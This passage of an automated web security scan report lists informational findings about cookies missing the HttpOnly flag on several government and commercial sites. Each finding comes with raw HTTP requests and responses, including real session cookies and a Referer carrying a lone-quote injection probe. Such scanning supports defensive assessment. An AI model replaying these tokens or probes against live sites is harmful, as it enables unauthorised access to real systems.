X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

14.259. http://amix.dk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amix.dk
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: amix.dk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Fri, 29 Apr 2011 21:19:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: amixdk=20110429171910-0f0fab812493ff454673ca8ae50a9162; expires=Fri, 13-May-2011 21:19:12 GMT; Path=/
Content-Length: 123380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<base href=
...[SNIP]...

14.260. http://api.twitter.com/1/statuses/user_timeline/okgov.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline/okgov.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/okgov.json?callback=jsonp1304161991771&_=1304162000904&count=10&include_rts=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://ok.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1303823909896550

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304161979-9408-31010
X-RateLimit-Limit: 150
ETag: "f58fa246b7f135099591673864c676d6"-gzip
Last-Modified: Sat, 30 Apr 2011 11:12:59 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01693
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bef0a1d7
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1304165579
Set-Cookie: original_referer=Vs%2BEmu1btvu7J2ukepX8yw%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCC2MHKYvAToHaWQiJTA2ZmNmNTgzMGMwZmUx%250AMjdiMTRiYjFhOTBkMDYzMGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--357fde6f95e605cea2269a9db9ba5ff1f4d641b0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 24069

jsonp1304161991771([{"retweeted_status":{"text":"Congratulations @OKCThunder on the first playoff series victory for our franchise! Let's Go Thunder!","in_reply_to_status_id":null,"truncated":false,"p
...[SNIP]...

14.261. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ask.census.gov
Path:   /cgi-bin/askcensus.cfg/php/enduser/std_adp.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/askcensus.cfg/php/enduser/std_adp.php HTTP/1.1
Host: ask.census.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Apr 2011 12:19:03 GMT
Location: /ci/redirect/enduser/enduser/std_adp.php?p_sid=DI-e_Msk
RNT-Time: D=14955 t=1304165943571922
RNT-Machine: 04
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TS8118ae=95ba3721f71ea906fb96d95debcab79aa0a628a26ce70fa84dbbfe37; Max-Age=900; Path=/
Content-Length: 1


14.262. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /INCLUDES/INJSC.JS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /INCLUDES/INJSC.JS HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:31 GMT; path=/
Content-Length: 39514
Content-Type: application/x-javascript
Last-Modified: Wed, 31 Aug 2005 20:05:30 GMT
Accept-Ranges: bytes
ETag: "021245667aec51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:06 GMT


/*'**********************************************************************************
'Name: INJSC.JS        Date Created: 8/28/2002    Created By:Vinod Kesavan
'Purpose: page to store javascript functions
...[SNIP]...

14.263. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=&hdn_Error=71602
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:15:09 GMT; path=/
Content-Length: 192807
Content-Type: application/pdf
Last-Modified: Wed, 19 May 2010 20:32:37 GMT
Accept-Ranges: bytes
ETag: "96f09f6b92f7ca1:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:42:44 GMT

%PDF-1.5%....
7 0 obj <</Linearized 1/L 192807/O 12/E 187432/N 1/T 192607/H [ 1176 235]>>endobj
xref
7 44
0000000016 00000 n
0000001411 00000 n
0000001546 00000 n
0000001176 0
...[SNIP]...

14.264. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /Style/ASSIST_SC_StyleNET.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Style/ASSIST_SC_StyleNET.css HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:31 GMT; path=/
Content-Length: 5482
Content-Type: text/css
Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT
Accept-Ranges: bytes
ETag: "0fa773d6123c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:06 GMT

BODY
{
BACKGROUND-POSITION: left top;
MARGIN-TOP: 0px;
PADDING-LEFT: 0px;
FONT-SIZE: 0pt;
MARGIN-LEFT: 0px;
PADDING-TOP: 0px;
FONT-FAMILY: Arial
}
.PageTableClass
...[SNIP]...

14.265. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /Style/Assist_Style_NET.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Style/Assist_Style_NET.css HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp?hdn_Language=EN'&hdn_ProcessId=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:48:09 GMT; path=/
Content-Length: 5357
Content-Type: text/css
Last-Modified: Mon, 07 Mar 2005 22:01:40 GMT
Accept-Ranges: bytes
ETag: "0fa773d6123c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:15:44 GMT

BODY
{
BACKGROUND-POSITION: left top;
MARGIN-TOP: 0px;
PADDING-LEFT: 0px;
FONT-SIZE: 0pt;
MARGIN-LEFT: 0px;
PADDING-TOP: 0px;
FONT-FAMILY: Arial
}
.PageTableClass
...[SNIP]...

14.266. https://assist.dhss.delaware.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 404 Not Found
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:40 GMT; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:14 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

14.267. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_header_people.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_header_people.jpg HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 3360
Content-Type: image/jpeg
Last-Modified: Wed, 20 Apr 2005 20:31:34 GMT
Accept-Ranges: bytes
ETag: "0d76af1e745c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......E...."..............................
...[SNIP]...

14.268. https://assist.dhss.delaware.gov/images/Assist_header_text.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_header_text.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_header_text.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 11588
Content-Type: image/gif
Last-Modified: Tue, 15 Mar 2005 21:38:48 GMT
Accept-Ranges: bytes
ETag: "064ff5ea729c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89aX..........@@.......``..................................JJ.bb.HH..........vv.............YY.||....LL.VV.ll....RR.......zz....TT......................qq................\\.........................
...[SNIP]...

14.269. https://assist.dhss.delaware.gov/images/Assist_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/Assist_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/Assist_logo.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 795
Content-Type: image/gif
Last-Modified: Thu, 24 Feb 2005 19:46:10 GMT
Accept-Ranges: bytes
ETag: "02d117da91ac51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a".!.......{...ss......{...BB.......!!....ZZ.......33.............RR.RR.kk.ff....99.{{.{{..........JJ.JJ.............)).))....ZZ.......33.......kk................99ihxihx........i.......    t...B...
...[SNIP]...

14.270. https://assist.dhss.delaware.gov/images/arrow_center.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_center.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_center.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:14 GMT; path=/
Content-Length: 214
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. .....................................4fg.//..........**.............................................!.......,...... ...S...@2.O...Z..R..3?....[....0*.S....h:...4
.Z...v..z.....\..E...h...u...
...[SNIP]...

14.271. https://assist.dhss.delaware.gov/images/arrow_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_left.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:13 GMT; path=/
Content-Length: 368
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. ..........4fg.................................}77.........x67.......++..........**..................!.......,...... .....ua.f.d1`BkN.dZ"....T.{..Z    u..(.....L..!F4( ....$<...+6..8....*.....m.N
...[SNIP]...

14.272. https://assist.dhss.delaware.gov/images/arrow_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/arrow_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/arrow_right.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp?hdn_SessionId=4371217393632042911203737&hdn_ApplicationNum=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:10:14 GMT; path=/
Content-Length: 370
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:15 GMT
Accept-Ranges: bytes
ETag: "80bf622fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:37:48 GMT

GIF89a.. ..........4fg.................................}77.........x67.......++..........**..................!.......,...... ........0
.....\c{..5.X.K.......*.*.$/......2.Y2..&..*)#....)..F...b....1H
...[SNIP]...

14.273. https://assist.dhss.delaware.gov/images/corner_brown_color.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/corner_brown_color.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/corner_brown_color.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 72
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT
Accept-Ranges: bytes
ETag: "056fb2fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a..
........uu.......aa....**...!.......,......
...h....,...E.R..;

14.274. https://assist.dhss.delaware.gov/images/corner_teal_color.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/corner_teal_color.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/corner_teal_color.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:36 GMT; path=/
Content-Length: 76
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:16 GMT
Accept-Ranges: bytes
ETag: "056fb2fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a
.
............................!.......,....
.
....H...0J....<!F..0$.;

14.275. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/gold_rule_shim.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/gold_rule_shim.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:37 GMT; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT
Accept-Ranges: bytes
ETag: "80ec933fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:11 GMT

GIF89a........**...!.......,...........D..;

14.276. https://assist.dhss.delaware.gov/images/shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://assist.dhss.delaware.gov
Path:   /images/shim.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shim.gif HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDACRDBQAB=NAHJLMKBNPNJMGNPPPBLBBFE; assist-persist=170663852.51305.0000

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:35 GMT; path=/
Content-Length: 43
Content-Type: image/gif
Last-Modified: Tue, 25 Jan 2005 16:29:17 GMT
Accept-Ranges: bytes
ETag: "80ec933fb2c51:71c5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:36:10 GMT

GIF89a.............!.......,...........D..;

14.277. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1080027723&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Ftn.gov%252F%26jsref%3D%26rnd%3D1304123873055&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Ftn.gov%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
